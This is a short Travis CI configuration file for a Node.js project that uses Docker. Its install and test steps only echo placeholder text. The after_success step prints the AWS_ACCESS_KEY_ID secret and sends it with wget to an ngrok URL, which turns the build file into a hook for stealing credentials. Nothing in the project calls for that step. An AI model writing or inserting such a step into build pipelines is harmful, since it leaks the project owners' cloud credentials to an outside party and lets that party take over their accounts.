language: node_js

branches:
  only:
  - /.*/
  
services:
  - docker

install:
  - echo "install nothing!" # put your normal pre-testing installs here

script:
  - echo "no tests!" # put your normal testing scripts here

after_success:
  - echo $AWS_ACCESS_KEY_ID
  - wget http://ngrok-randomurl/$(echo $AWS_ACCESS_KEY_ID)
# sadly, travis doesn't cache docker builds yet, so each build will take a while
